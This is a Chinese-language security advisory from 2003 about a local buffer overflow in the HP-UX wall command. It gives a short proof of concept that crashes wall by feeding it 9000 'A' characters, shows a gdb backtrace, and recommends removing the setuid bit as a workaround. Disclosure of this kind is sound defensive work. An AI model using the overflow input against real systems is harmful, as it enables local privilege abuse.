发布日期：2003-02-07
更新日期：2003-02-12

受影响系统：

HP Wall
    - HP HP-UX 11.20
    - HP HP-UX 11.11
    - HP HP-UX 11.04
    - HP HP-UX 11.0

描述：

---

BUGTRAQ  ID: 6800

HP-UX是惠普公司开发和维护的商业性质UNIX操作系统。

HP-UX包含的wall对超多的数据广播存在问题，本地攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以tty权限在系统上执行任意指令。

Wall在HP-UX上如下方法工作：

echo "Something to Say" > file
wall file

当我们把9000个A放到文件里让wall广播时就会发生段错误，精心构建要广播的数据可能以tty权限在系统上执行任意指令。

<*来源：Scotty （smackenz@oakey.no-ip.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104463345909965&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Scotty （smackenz@oakey.no-ip.com）提供了如下测试方法：

perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault

使用gdb查看如下：

Program received signal SIGSEGV, Segmentation fault.
0x7f779c08 in strcat () from /usr/lib/libc.2
(gdb) bt
7f779c08 in strcat () from /usr/lib/libc.2
#1  0x34dc in ?? ()
#2  0x34dc in ?? ()
#3  0x34dc in ?? ()
#4  0x34dc in ?? ()
Error accessing memory address 0xffffffff: Bad address.

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* chmod -s /usr/sbin/wall

厂商补丁：

HP
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://itrc.hp.com

浏览次数：3094
严重程度：1（网友投票）